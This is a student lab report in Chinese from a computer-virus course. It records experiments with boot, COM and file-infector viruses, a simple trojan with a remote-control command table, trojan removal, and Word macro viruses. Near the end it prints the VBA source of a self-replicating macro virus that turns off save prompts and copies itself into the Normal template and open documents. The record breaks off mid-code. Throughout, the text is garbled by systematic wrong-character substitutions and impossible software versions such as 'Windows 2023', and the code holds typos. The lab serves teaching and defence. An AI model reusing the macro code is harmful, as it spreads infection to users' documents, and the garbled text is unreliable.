南京航空航天大学计算机病毒及防治上机实验报告学院:理学院专业:信息与计算科学学号:姓名:王晨雨授课老师:薛明富十二月目录实验一:引导型病毒实验 3实验二:Com病毒实验 4实验三:PE文献格式实验 5实验四:32位文献型病毒实验 6实验五:简朴的木马实验 7实验七:木马病毒清除实验(选做) 8实验八:Word宏病毒实验(一) 9实验九:Word宏病毒实验(二) 10实验十:Linux脚本病毒实验(选做) 11实验十二:基于U盘传播的蠕虫病毒实验 12实验十三:邮件型病毒实验 13实验十四:Web恶意代码实验 14实验一:引导型病毒实验【实验目的】 通过实验,了解引导区病毒的感染对象和感染特性,重点学习引导病毒的感染机制和恢复感染病毒文献的方法,提高汇编语言的使用能力实验内容引导阶段病毒由软盘感染硬盘实验通过触发病毒,观测病毒发作的现象和环节,学习病毒的感染机制:阅读和分析病毒的代码DOS运营时病毒由硬盘感染软盘的实现通过触发病毒,观测病毒发作的现象和环节,学习病毒的感染机制:阅读和分析病毒的代码实验平台】VMWare Workstation 12 PROMS-DOS 7.10【实验内容】第一步:环境安装安装虚拟机VMWare,在虚拟机环境内安装MS-DOS 7.10环境。
第二步:软盘感染硬盘1) 运营虚拟机,检查目前虚拟硬盘是否具有病毒,图1表达没有病毒正常启动硬盘的状态2) 在附书资源中复制具有病毒的虚拟软盘virus.img3) 将具有病毒的软盘插入虚拟机引导,可以看到闪动的字符*^_^*,如图2所示,按任意键进入图3第三步:验证硬盘已经被感染1) 取出虚拟软盘,通过硬盘引导,再次出现了病毒的画面如图42) 按任意键后正常引导了DOS系统如图5可见,硬盘已被感染第四步:硬盘感染软盘1) 下载empty.img,并且将它插入虚拟机,启动计算机,由于该盘为空,如图6.2) 取出虚拟软盘,从硬盘启动,通过命令format A:/q快速格式化软盘也许提醒犯错,这时只要按R键即可如图7.3) 成功格式化后的结果如图84) 不要取出虚拟软盘,重新启动虚拟机,这时是从empty.img引导,可以看到病毒的画面,如图9按任意键进入图10.可见,病毒已经成功由硬盘传染给了软盘实验截图:1. 软盘启动后:2. 硬盘启动后: 实验二:Com病毒实验【实验目的】1、掌握COM病毒的传播原理2、掌握MASM611编译工具的使用实验平台】1、MS-DOS 7.102、MASM611【实验内容】1、 安装MS-DOS 7.10环境。
虚拟机安装该环境亦可,环节在此不再赘述2、 在MS-DOS C:\MASM目录下安装MASM611,然后将binr目录下的link.exe复制到bin目录下3、 在com目录下复制病毒程序Virus.asm及测试程序源代码BeInfected.asm4、 编译链接BeInfected.asm,形成BeInfectedcom测试程序5、 编译链接virus.asm,生成病毒程序virus.exe6、 在C:\MASM\Bin目录下建立del.txt文献,并且将“”和病毒代码2“virus.asm”复制到此目录下7、 执行“”观测结果8、 编译并连接 “virus.asm” 生成“virus.exe”,执行此exe文献以感染“”文献并且自动删除del.txt,而后执行“”可以发现感染后的结果实验截图:1. 编译存储好文献:2. Dos下查看文献夹内容:3. 查看TEST的内容:4. 运营病毒程序:5. 查看感染病毒后文献夹内容:6. 查看感染病毒后TEST的内容:实验三:PE文献格式实验【实验目的】了解PE文献基本结构【实验环境】运营环境:Windows 2023、Windows 9x、Windows NT 以及 Windows XP编译环境: Visual Studio 6.0【实验环节】使用编译环境打开源代码工程,编译后可以生成winpe.exe。
预备环节:找任意一个Win32下的Exe文献作为查看对象实验内容:运营winpe.exe,并打开任一exe文献,选择不同的菜单,可以查看到exe文献的内部结构实验截图: 感染前 感染后第一处:第二处:第三处:第四处:第五处:感染前:感染后:实验四:32位文献型病毒实验【实验目的】l 了解文献型病毒的基本制造过程l 了解病毒的感染、破坏机制,进一步结识病毒程序l 掌握文献型病毒的特性和内在机制【实验环境】运营环境Windows 2023、Windows 9x、Windows NT 和 Windows XP【实验环节】目录中的virus.rar包中涉及Virus.exe(编译的病毒程序)、软件使用说明书.doc(请仔细阅读)、源代码详解.doc(对代码部分加入了部分注释)以及pll.asm(程序源代码)Example.rar包中选取的是一个常用程序(ebookedit)安装后的安装目录下的程序,用于测试病毒程序预备环节:将example.rar解压到某个目录解压完毕后,应当在该目录下有Buttons目录、ebookcode.exe、ebookedit.exe、ebrand-it.exe以及keymaker.exe等程序,然后把virus.rar包解压后的Virus.exe复制到该目录中。
实验内容:通过运营病毒程序观看各步的提醒以了解病毒的内在机制实验截图:1.感染前准备:2.感染过程:3.感染后:4.感染文献比对实验五:简朴的木马实验【实验目的】掌握木马的基本原理【实验环境】l Windows XP 操作系统l Visual Studio 6.0 编程环境【实验环节】(1) 复制实验文献到实验的计算机上其中,SocketListener目录下是木马Server端源代码,SocketCommand目录下是木马Client端源代码2) 用Visual Studio 6.0环境分别编译这两部分代码3) 运营SocketListener应用程序,也就是启动了木马被控端4) 运营SocketCommand应用程序,也就是启动了木马的控制端,可以在控制端执行命令来控制被控制端实验支持的命令参考表:命令命令含义CMD执行应用程序!SHUT退出木马FILEGET获得远程文献EDITCONF编辑配置文献LIST列目录VIEW查看文献内容CDOPEN关CDCDCLOSE开CDREBOOT重启远端计算机实验截图:1.建立连接:2.发送指令及成功后结果:(1) 运营程序:(2) 关闭木马:(3) 获得文献:(4) 编辑配置文献:(5) 查看文献:(6) 查看文献内容:(7) 重启计算机:实验七:木马病毒清除实验(选做)【实验目的】掌握木马病毒清除的基本原理【实验平台】l Windows 32 位操作系统l Visual Studio 7.0 编译环境【实验环节】文献Antitrojan.sln为工程文献。
使用Visual Studio编译该工程,生成Antitrojan.exe可执行程序执行Antitrojan.exe观测执行效果实验截图:1. 确认木马存在:2. 进行编译:(1) 修改实验机名字:(2) 添加查杀代号:(3) 添加查杀代码:3. 清除成功:实验八:Word宏病毒实验(一)实验目的 Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使平常工作变得容易本实验演示了宏的编写,通过两个简朴的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的结识,提高防范意识实验所需条件和环境硬件设备:局域网,终端PC机系统软件:Windows系列操作系统支撑软件:Word 2023软件设立:关闭杀毒软;打开Word 2023,在工具à宏à安全性中,将安全级别设立为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问实验环境配置如下图所示:宏病毒传播示意图实验内容和分析 为了保证该实验不至于导致较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。
例1 自我复制,感染word公用模板和当前文档代码如下:'Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.SaveNormalPrompt = FalseOurcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith Host If .Lines(1.1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = nomaltemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End IfEnd WithMsgBox "MicroVirus by Content Security 。